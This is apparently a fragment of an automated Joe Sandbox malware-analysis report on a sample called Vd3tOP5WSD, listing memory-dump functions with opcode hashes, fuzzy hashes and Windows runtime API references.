                                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                            • Instruction ID: 5cec3fdcb0f7ad7248cd654406fc0301a628365af5a8d6cf3c1d2e3e67252cec
                                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                            • Instruction Fuzzy Hash: E31108B7A0318243A6148A2DD8B4FB7E39DEAC5331B2F467ED0418B658D222ED44D602
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 667bd2f19aee6fa7d81c4cb481a3f51af8e19f63dc029046603eb54790070f8a
                                                            • Instruction ID: ddd64d175838b84a2913698df646aeb53803cdc0fa852135122372258e70ecfb
                                                            • Opcode Fuzzy Hash: 667bd2f19aee6fa7d81c4cb481a3f51af8e19f63dc029046603eb54790070f8a
                                                            • Instruction Fuzzy Hash: 611191B26002486FD304AF69CD85F67FAECEB88364F058179FD089B313D635ED148A61
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 66ff2f2a13dd8e2f3e7900633aa22c2d0bddf0cea2b0e0fcf3d4903cf0c1afe8
                                                            • Instruction ID: 206722fa505040e1a375028c3d9dc225e4bf817585225838ae574e482737c9d3
                                                            • Opcode Fuzzy Hash: 66ff2f2a13dd8e2f3e7900633aa22c2d0bddf0cea2b0e0fcf3d4903cf0c1afe8
                                                            • Instruction Fuzzy Hash: 2C217F71A0021A8FCB24CF58C990BAAB7B5FF85728F68855CC8455B382D739FC42CB91
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3920154401.0000000000A38000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A38000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a38000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                            • Instruction ID: 1ae51dea881ef4217d641d8f1b9dea47dfa99a0d979e67f37eac7a6dfe343755
                                                            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                            • Instruction Fuzzy Hash: 51112A72340100AFDB58DF55DC91FA773AAEB89360B298065E909CB356D6B6E841CB60
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c0cbf25b4c85234f202655fa8cc2e504dfd54c569fa544efbece1cc302c4c175
                                                            • Instruction ID: 6f48b074c48d23598abafedd234a974fd491e4a774c1cb071c1f5f5c015a6ef2
                                                            • Opcode Fuzzy Hash: c0cbf25b4c85234f202655fa8cc2e504dfd54c569fa544efbece1cc302c4c175
                                                            • Instruction Fuzzy Hash: 3511A977A182B107D715CF769CE012AF7A2ABC732270F4375EE81EB252C120EC1986E5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                            • Instruction ID: 20449515b471976cf505e7bcb2a80cd31bbea7e4a143e498953b162d80f6334e
                                                            • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                            • Instruction Fuzzy Hash: 1401D676A006048FDF21CFA8C804BAA33F9FBC6316F4944B5D91ADB281E774A941CF90
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d6d0ec938ce4093d67a2cf61a3cc3f8e03a2e4f7c65607b08f985ba338c785d5
                                                            • Instruction ID: 8155e30d7324677229f6719365bc4abb5285ab124924269bb5d815f2ea84d363
                                                            • Opcode Fuzzy Hash: d6d0ec938ce4093d67a2cf61a3cc3f8e03a2e4f7c65607b08f985ba338c785d5
                                                            • Instruction Fuzzy Hash: DDE01A35A006849ED7028F25D994B407BA1E714B10F448069E400D7A79F3B46C80CF4B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e9c2f219f0a9af3f176a5929433c540c90c9a3d9d29b5cff4e9fefba7a9b2e30
                                                            • Instruction ID: 83a8c1bef34e8d0ec7e92b9e6996aa7ee6f07f6bb6c7f505a541c9aeb87c715c
                                                            • Opcode Fuzzy Hash: e9c2f219f0a9af3f176a5929433c540c90c9a3d9d29b5cff4e9fefba7a9b2e30
                                                            • Instruction Fuzzy Hash: 43C08C380909804ACE39893082723A43369A3D1783F8C848ECC438B786C61E9DC2E602
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d46244e68fc71b8cbf41339a9e21dde89906441e25df86e8e15a46fb3bb963b5
                                                            • Instruction ID: 30d6a56a56b12a395d7ff791b47855085cb38f022cae8e32c46adfbfa56ecdc7
                                                            • Opcode Fuzzy Hash: d46244e68fc71b8cbf41339a9e21dde89906441e25df86e8e15a46fb3bb963b5
                                                            • Instruction Fuzzy Hash: 14D08031255540AFC745DB44CE40F00B7E0EB88733F254340B430673F1C720E901CA01
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: adb50997bff8f6b42dea5567a3e80c24e84f9fd98b00b9a5e01fe7e8c8691b55
                                                            • Instruction ID: c0944383d73aac26117361346b053748916b56d97ab65fadc12e4df891c8d7e9
                                                            • Opcode Fuzzy Hash: adb50997bff8f6b42dea5567a3e80c24e84f9fd98b00b9a5e01fe7e8c8691b55
                                                            • Instruction Fuzzy Hash: 7AB00279661540CFCA55CF08C198E00F3F4FB48760B068491EC05CB722C234ED41CA10
                                                            APIs
                                                            • type_info::operator==.LIBVCRUNTIME ref: 009E9D25
                                                            • CatchIt.LIBVCRUNTIME ref: 009E9E84
                                                            • _UnwindNestedFrames.LIBCMT ref: 009E9F85
                                                            • CallUnexpected.LIBVCRUNTIME ref: 009E9FA0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CallCatchFramesNestedUnexpectedUnwindtype_info::operator==
                                                            • String ID: csm$csm$csm
                                                            • API String ID: 2332921423-393685449
                                                            • Opcode ID: 4d4d2abbed9b856c4e49574ec055b924c190fec3ea5a9e19aedb67fed442bc91
                                                            • Instruction ID: 454f0016bc1105cf60f3ed01c67eaa321d83dfee95c0e34d0d5bf86bc1dbfbc8
                                                            • Opcode Fuzzy Hash: 4d4d2abbed9b856c4e49574ec055b924c190fec3ea5a9e19aedb67fed442bc91
                                                            • Instruction Fuzzy Hash: 73B1BC71800249EFCF26DFA6C881AAEBBB9FF54310F14445AF815AB252D731EE51CB91
                                                            APIs
                                                            • CreateCompatibleDC.GDI32(00000D62), ref: 009C2AFB
                                                            • DeleteDC.GDI32(00000002), ref: 009C2D68
                                                            • DeleteObject.GDI32(?), ref: 009C2D71
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Delete$CompatibleCreateObject
                                                            • String ID:
                                                            • API String ID: 1022343127-0
                                                            • Opcode ID: e95f5015060c6103ea10429a1b77e37f05786f833e418949151545d05b0bc3b2
                                                            • Instruction ID: a98b7e267933f8cc8d9881da52f9bea788e1c691de4e789b3e3ffa777ca03b50
                                                            • Opcode Fuzzy Hash: e95f5015060c6103ea10429a1b77e37f05786f833e418949151545d05b0bc3b2
                                                            • Instruction Fuzzy Hash: 10811AB1C0420A9BDF209F948DC5F7E7B74EB1A320F24091EE515EA3A1D3758E409B67
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9fe71bcdd1bbb702f49a54012c45d7b8d444f282691c212cc4cbc8a317458075
                                                            • Instruction ID: 889add2efb84559f50f0350deaacced1bd291bfe9df5fc9060910b3263bb9132
                                                            • Opcode Fuzzy Hash: 9fe71bcdd1bbb702f49a54012c45d7b8d444f282691c212cc4cbc8a317458075
                                                            • Instruction Fuzzy Hash: F9B11774A442C9AFDB12DF9AC880BBD7BBDBF89310F148159E405AB391DB709D42CB61
                                                            APIs
                                                            • __allrem.LIBCMT ref: 009D5B59
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009D5B75
                                                            • __allrem.LIBCMT ref: 009D5B8C
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009D5BAA
                                                            • __allrem.LIBCMT ref: 009D5BC1
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009D5BDF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                            • String ID:
                                                            • API String ID: 1992179935-0
                                                            • Opcode ID: 2e1f11e2f5fb8b6f5f5cb9471793ade9c397e797c40a1014ab29af20b239fdf2
                                                            • Instruction ID: c335f61c649347531cebd75a32a5ffcdf05a30b84f1ee59e67312b2c24c5424f
                                                            • Opcode Fuzzy Hash: 2e1f11e2f5fb8b6f5f5cb9471793ade9c397e797c40a1014ab29af20b239fdf2
                                                            • Instruction Fuzzy Hash: DF811571680B469BE724AF79CC81B6AB3A9AF84324F25C62BF055D73C1E774ED008B50
                                                            APIs
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 009C3124
                                                              • Part of subcall function 009C10D3: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 009C11AC
                                                              • Part of subcall function 009C297F: CreateCompatibleDC.GDI32(00000D62), ref: 009C2AFB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateCompatibleCreateHeapInfoParametersSystem
                                                            • String ID: Ku^%$Ku^%
                                                            • API String ID: 392924372-1067927601
                                                            • Opcode ID: 5fba2874abc2024b8c6e5124d58d55933df8614bf4ced896e9a56da650471c50
                                                            • Instruction ID: 0304020a8b7357aa871a9953845c05fe796190611bb92348202f0d2440968c71
                                                            • Opcode Fuzzy Hash: 5fba2874abc2024b8c6e5124d58d55933df8614bf4ced896e9a56da650471c50
                                                            • Instruction Fuzzy Hash: 98E10671D041168BDF289B688845F7E7A64AB65310F24CA2EF512FB2E1D779CF408787
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,009DC460,009CD70D,009CD25E), ref: 009DC477
                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 009DC485
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009DC49E
                                                            • SetLastError.KERNEL32(00000000,009DC460,009CD70D,009CD25E), ref: 009DC4F0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLastValue___vcrt_
                                                            • String ID:
                                                            • API String ID: 3852720340-0
                                                            • Opcode ID: 3af03ad12e9647128257a5912ac6000d76f7b2b06ff93b3a1d903c536e80f5b5
                                                            • Instruction ID: b243435576e265c771f58fd4bbaadd3fc81a724c6f577d61eef3582ab114c2b4
                                                            • Opcode Fuzzy Hash: 3af03ad12e9647128257a5912ac6000d76f7b2b06ff93b3a1d903c536e80f5b5
                                                            • Instruction Fuzzy Hash: 5E01F17628D2132EA62126B5BC9667B3A8CCF513B4320863BFA30D92F2FF910C41D185
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $^F
                                                            • API String ID: 0-2072159057
                                                            • Opcode ID: 7b640e70ded73f9c08873221f97cb98eab12bfdaea4e205fc4c25b8478a09ce9
                                                            • Instruction ID: e961032a164950f86c0559071d9100b9a7488e1169e208644523c3dcca552d20
                                                            • Opcode Fuzzy Hash: 7b640e70ded73f9c08873221f97cb98eab12bfdaea4e205fc4c25b8478a09ce9
                                                            • Instruction Fuzzy Hash: 42411871A00784AFD7269F79CC09B7ABBE8EB84710F14C52AF046DB281D275DE408780
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c3608c6e5e2c178f7c1cfe104e837bc4478c8e9b3100bb118724dc105c523b5b
                                                            • Instruction ID: 8b5f998be72c98b3f33b5325644fb277464bdfdd60f47ac4d92e359f7c8e9959
                                                            • Opcode Fuzzy Hash: c3608c6e5e2c178f7c1cfe104e837bc4478c8e9b3100bb118724dc105c523b5b
                                                            • Instruction Fuzzy Hash: 9B513E36940249AACB10DFE4D945AEEB7BCEF48710F10811BF815E7350EB70EA81CB69
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ^^4$^^4$~rjz
                                                            • API String ID: 0-2511145224
                                                            • Opcode ID: cb0dc4f94c1c179675eca45769f3c93bbdb24bff6a976fde1cfb2fc9678cba59
                                                            • Instruction ID: 88efb82df384514071bdab9aed25b6a7626d3c4f254faaf201006ed0cbe2dff8
                                                            • Opcode Fuzzy Hash: cb0dc4f94c1c179675eca45769f3c93bbdb24bff6a976fde1cfb2fc9678cba59
                                                            • Instruction Fuzzy Hash: C8618B63E011A657EF64461C8885FBEF2299B84310F75CA2FF109FB291CA25CF41DA43
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _strlen
                                                            • String ID: ,]{: }$fE$fE
                                                            • API String ID: 4218353326-1418347821
                                                            • Opcode ID: c472bb84d9ff05f3389f2633287c6e63b4c59ab839c65fc641c5baeda17e4bdc
                                                            • Instruction ID: 818feef99c7737f30494d3e3b30cd287bf5ceedbec0388f66f513fdf29d593cd
                                                            • Opcode Fuzzy Hash: c472bb84d9ff05f3389f2633287c6e63b4c59ab839c65fc641c5baeda17e4bdc
                                                            • Instruction Fuzzy Hash: 795102B27043094BDF12AAAD9C51B2FA2CA9FD5354F1A8638ED59C3342FB71DC168252
                                                            APIs
                                                            • RtlEncodePointer.NTDLL(00000000), ref: 009EA050
                                                            • CatchIt.LIBVCRUNTIME ref: 009EA136
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CatchEncodePointer
                                                            • String ID: MOC$RCC
                                                            • API String ID: 1435073870-2084237596
                                                            • Opcode ID: f6539cf28fa7df93cb7a4fd0398e0aeb39c553d0f7c18ec6f96af6878300a19c
                                                            • Instruction ID: 9f8bc32bb128865737d5ff47f2f034e93efed300443a0519c1ca9a9ffeeff35d
                                                            • Opcode Fuzzy Hash: f6539cf28fa7df93cb7a4fd0398e0aeb39c553d0f7c18ec6f96af6878300a19c
                                                            • Instruction Fuzzy Hash: 92416C71900249AFCF16DF99CD81AEEBBB9FF48300F188099F915A7261D335AD50DB51
                                                            APIs
                                                            • GetConsoleOutputCP.KERNEL32(0046B080,009E578A,00000000,?), ref: 009E0A14
                                                              • Part of subcall function 009E346A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,009E578A,009E578A,009D3F62,009E0768,0000FDE9,00000000,?,?,?,009E1067,0000FDE9,00000000,?), ref: 009E3516
                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 009E0C6F
                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 009E0CB7
                                                            • GetLastError.KERNEL32 ref: 009E0D5A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                            • String ID:
                                                            • API String ID: 2112829910-0
                                                            • Opcode ID: f7a2fa6a9c7b7c2702c5415ca5342024ae727f2fb94ff8ae16218cd9c601ae44
                                                            • Instruction ID: eeae4c846fe2251e5b09f9560d36c46345bb288d2dbd0f1a9708e3c0a0368c96
                                                            • Opcode Fuzzy Hash: f7a2fa6a9c7b7c2702c5415ca5342024ae727f2fb94ff8ae16218cd9c601ae44
                                                            • Instruction Fuzzy Hash: DFD17B75D002889FCF16CFE9D880AADBBB9FF89300F18416AE855E7251E770AC81CB50
                                                            APIs
                                                            • CreateDCW.GDI32(00462C52,00000000,00000000,00000000), ref: 009C34EF
                                                            • GetSystemMetrics.USER32(00000001), ref: 009C362A
                                                            • GetSystemMetrics.USER32(00000000), ref: 009C3685
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MetricsSystem$Create
                                                            • String ID:
                                                            • API String ID: 1087689917-0
                                                            • Opcode ID: 39e2f0d19a532311fcde3bb1b361131464c434098777e83cc3901b20fe1d0761
                                                            • Instruction ID: 6e77651dc7ba7888d27cec578b2c9ee2546bf46b525594da6494488662a579cd
                                                            • Opcode Fuzzy Hash: 39e2f0d19a532311fcde3bb1b361131464c434098777e83cc3901b20fe1d0761
                                                            • Instruction Fuzzy Hash: 34511771D00906ABDF294A5C8956FBD75AAAB49314F30C92FE405EA3B0D278CF844A53
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AdjustPointer
                                                            • String ID:
                                                            • API String ID: 1740715915-0
                                                            • Opcode ID: e549594ee335f88c809106c5544a2f4baf43b5eb7b90bfa02ae88c691973c827
                                                            • Instruction ID: e99df74312c6e8717717d9e367b03961f129d482623a5348329ac4b23bea3f7f
                                                            • Opcode Fuzzy Hash: e549594ee335f88c809106c5544a2f4baf43b5eb7b90bfa02ae88c691973c827
                                                            • Instruction Fuzzy Hash: 32510772A05282EFDB2ADF56C881B7A73A8FF84300F14453DE80987292E735ED81C791
                                                            APIs
                                                            • FreeLibrary.KERNEL32(00000000,?,009DD289,000000FF,0046B0C0,009C6A8C,00000000,00995C9A,?,009DD03D,00000021,00465044,0046503C,00465044,009C6A8C), ref: 009DD23D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: 6740c229368fb351fb4ec7fc524e13049988398a7c5dabcb7bff3fed9ad9b5d0
                                                            • Instruction ID: 8c5c4bf8d9e0fa6f3c4994b14946d2c03b988e154c6f0ea4dd81b68ef5af1ef8
                                                            • Opcode Fuzzy Hash: 6740c229368fb351fb4ec7fc524e13049988398a7c5dabcb7bff3fed9ad9b5d0
                                                            • Instruction Fuzzy Hash: 9721EE71EC2210A7DB219BA1EC40B5A376CDB52764F144122FD25A73D1F770EE00C6D5
                                                            APIs
                                                            • SetFilePointerEx.KERNEL32(?,00000000,00000000,009D8448,00000001,?,009D8448,009937CF,?,00000000), ref: 009E11BE
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,009937CF,00000000), ref: 009E11CB
                                                            • SetFilePointerEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,009937CF,00000000), ref: 009E11F1
                                                            • SetFilePointerEx.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 009E1217
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FilePointer$ErrorLast
                                                            • String ID:
                                                            • API String ID: 142388799-0
                                                            • Opcode ID: cfe5fe78128bb7dd68b840a0eb5d6fe201827b23293f70a06ce6f48395b8db59
                                                            • Instruction ID: aac645cdf34a23197a395ba378a66119693c27638cb0d3e0a40752583a67876d
                                                            • Opcode Fuzzy Hash: cfe5fe78128bb7dd68b840a0eb5d6fe201827b23293f70a06ce6f48395b8db59
                                                            • Instruction Fuzzy Hash: B7115375904259BBCF129FA6DC48A9E3F7DFF08360F108554F920A22A0E7B19E50DBA0
                                                            APIs
                                                            • GetFullPathNameW.KERNEL32(?,?,?,00000000,009E5F06,00000000,?,009EB683,009E5F06,009D6E9E,?,00000000,00000104,?,00000001,00000000), ref: 009E6023
                                                            • GetLastError.KERNEL32(?,009EB683,009E5F06,009D6E9E,?,00000000,00000104,?,00000001,00000000,00000000,?,009E5F06,?,00000104,009D6E9E), ref: 009E602D
                                                            • __dosmaperr.LIBCMT ref: 009E6034
                                                            • GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,009EB683,009E5F06,009D6E9E,?,00000000,00000104,?,00000001,00000000,00000000), ref: 009E605E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FullNamePath$ErrorLast__dosmaperr
                                                            • String ID:
                                                            • API String ID: 1391015842-0
                                                            • Opcode ID: c7c4edbd7a7b70f3d07427bfb556099335345e9fdb19da3b7b6c0357393f98ce
                                                            • Instruction ID: 4489001e637561927dc74fea11ff96f30b4a7ab1ddbac5b17ab0f01d12bc3ea6
                                                            • Opcode Fuzzy Hash: c7c4edbd7a7b70f3d07427bfb556099335345e9fdb19da3b7b6c0357393f98ce
                                                            • Instruction Fuzzy Hash: 9EF0AF36200210AFDB319FA3DC08E1BBFADEF543A17108829F556C2920EB72EC10CB60
                                                            APIs
                                                            • GetFullPathNameW.KERNEL32(?,?,?,00000000,009E5F06,00000000,?,009EB60B,009E5F06,009E5F06,009D6E9E,?,00000000,00000104,?,00000001), ref: 009E6089
                                                            • GetLastError.KERNEL32(?,009EB60B,009E5F06,009E5F06,009D6E9E,?,00000000,00000104,?,00000001,00000000,00000000,?,009E5F06,?,00000104), ref: 009E6093
                                                            • __dosmaperr.LIBCMT ref: 009E609A
                                                            • GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,009EB60B,009E5F06,009E5F06,009D6E9E,?,00000000,00000104,?,00000001,00000000), ref: 009E60C4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FullNamePath$ErrorLast__dosmaperr
                                                            • String ID:
                                                            • API String ID: 1391015842-0
                                                            • Opcode ID: a72e1de69e8ac08235e0b59f4006df7dc26bf1db3731920fcb84235d1ad79fd5
                                                            • Instruction ID: ebfa06407dfc4f8aec32b58f49bf06a275420a00aa385c6f0b4c03912002f88f
                                                            • Opcode Fuzzy Hash: a72e1de69e8ac08235e0b59f4006df7dc26bf1db3731920fcb84235d1ad79fd5
                                                            • Instruction Fuzzy Hash: A3F0A436200610AFDB215BB3DC04F57BBADEFA53A17108829F555C2520EBB1EC108B60
                                                            APIs
                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 009CDA16
                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 009CDACA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_990000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
